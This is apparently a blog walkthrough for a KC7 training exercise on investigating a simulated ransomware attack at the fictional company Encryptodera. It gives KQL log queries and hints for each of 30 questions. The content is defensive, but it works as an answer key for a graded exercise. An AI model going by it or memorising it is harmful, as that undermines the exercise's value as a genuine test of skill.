KC7 Inside Encryptodera Section 2: Crypto Conquest

This post is a write-up or clues on how to resolve the KC7 investigation case of Inside Encryptodera Section 2: Crypto Conquest . You can use it as a helpful guide when you encounter an obstacle, as it structured as a fill-in-the-blanks solution.

Section 2:

Question 1: What is the filename of this note?

Do you see it? It is the .txt file name.

FileCreationEvents
| where path contains "GIMME"
| distinct filename
| project filename

Question 2: What kind of attack is this?

Data encrypted for impact T1486 .

Question 3: On how many machines was this .txt file seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| distinct hostname
| count

Question 4: What time was the ransom note first seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp

Question 5: What is the hostname of the system where the ransom note was first seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp, hostname

Question 6: How many files were encrypted on this machine?

The question provided us with the hostname *UL8R-MACHINE *and the timestamp 2024-02-17. By running the following KQL we can review the activities:

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)

After adding | distinct filename to the KQL above I found two files files_go_byebye.exe and YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt that don’t end with .umadbro

This should allow you to find the answer but let me do a challenge to stretch my brain! From the filename column I found 3 find extension types .txt , .exe and .umadbro. Let’s assume there were more instead of scrolling I want an efficient way to get all the file types.

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)
| extend FileExtension = tostring(split(filename, ".")[-1])
| project  FileExtension
| summarize Count = count() by FileExtension
| sort by Count desc

• extend FileExtension = tostring(split(filename, ".")[-1]):
  • In this line, we are using the extend operator to create a new column called FileExtension.
  • We are using the split function to split the filename by the dot (".") character. This will create an array of substrings where the dot is the delimiter.
  • The [-1] index is used to extract the last element of the array, which represents the file extension.
  • We are converting the extracted file extension to a string using tostring function and storing it in the FileExtension column.

Question 7: What is the extension that was used on the encrypted files?

The answer is the extension with the most count from the answer to question number 6.

Question 8: What command was run that references the ransomware extension?

The questions provides the KQL and the answer is the one in ‘process_commandline’.

Question 9: When did files_go_byebye.exe appear on this machine?

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where filename contains "byebye"
| project timestamp

Question 10: How many commands were run on UL8R-MACHINE during this timeframe?

The question provides the KQL and you can see the count or records or add | count at the end of the KQL.

Question 11: What domain does the encoded PowerShell reference?

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| distinct process_commandline

The question gave us a hint powershell. I added the following line to decread the amount of lines to analyze.

| where process_commandline contains "powershell"

Copy the base64 and decode it with your favorite tool, script or using Base64 Decode online .

Question 12: What command is run right before the base64-encoded PowerShell?

The KQL from the answer to question 11 would reveal the answer or we can get the timestamp by using the following KQL.

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp < datetime(2024-02-17T02:29:53Z)
| project timestamp , process_commandline
| top 1 by timestamp desc 

Question 13: How many devices ran the gpupdate /force command?

ProcessEvents
| where process_commandline has "gpupdate /force"
| distinct hostname
| count

Question 14: How many machines at Encryptodera ran “systeminfo”?

ProcessEvents
| where process_commandline has "systeminfo"
| count

Question 15: What was the timestamp for the first time the command was run?

ProcessEvents
| where process_commandline has "systeminfo"
| top 1 by timestamp asc

Question 16: How many days elapsed between when the attackers ran discovery commands and when the ransomware attack started?

Calculate the date 🤯!

Question 17: What is the hostname of the device on which the attackers first ran systeminfo?

ProcessEvents
| where process_commandline contains "systeminfo"
| project timestamp , hostname
| top 1 by timestamp asc

Question 18: What was the full commandline used by the threat actor when running nltest /dclist? (paste the full commandline)

ProcessEvents
| where process_commandline contains "nltest /dclist"

Question 19: What is the full name of the .xlsx.exe file on 41QI-LAPTOP?

FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where path contains ".xlsx.exe"
| project filename

Question 20: What file shows up a few seconds after the .xlsx.exe file?

FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where timestamp > datetime(2024-02-01T08:50:12Z)
| top 1 by timestamp asc
| project timestamp , hostname, filename

Question 21: How many devices does screenconnect_client.exe appear on?

FileCreationEvents
| where filename contains "screenconnect_client.exe"
| count 

Question 22: Check the Email logs to see if the .xlsx.exe file was sent in a link. What email address was used to send this file?

Email
| where link contains "xlsx.exe"
| distinct sender

Question 23: How many unusual emails were sent by Barry?

Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where timestamp > (datetime("2024-02-01"))
| distinct subject
| count 

Question 24: Type got it once you’ve made a note of these recipients.

got it

Question 25: What IP was used to sign into Barry’s account on February 1st?

The AuthenticationEvents allows us to check filter the tables by the username. To find Barry’s user name we can locate it from the Employees table.

Employees
| where name contains "Barry"
| project name, username

AuthenticationEvents
| where username == "bashmelly"
| where timestamp between (datetime('2024-02-01T00:00:00Z') ..datetime('2024-02-01T23:59:59') )
| order by timestamp desc

Question 26: How many other accounts did that IP log into?

AuthenticationEvents
| where src_ip contains "143.38.175.105"

Question 27: How many IPs logged in to all 8 devices where the attacker ran systeminfo?

let hosts = ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| summarize dcount(hostname) by src_ip
| order by dcount_hostname desc

Question 28: What is the role of the employee who this IP address belongs to?

Employees
| where ip_addr == "10.10.0.138"
| project role

Question 29: How many successful logins were made from this IP?

AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| count 

Question 30: What is the hostname of the server the attackers logged into?

AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| where hostname contains "server" and hostname !contains "mail"

Community Help

Join Discord to discuss the module KC7 Discord #encryptodera .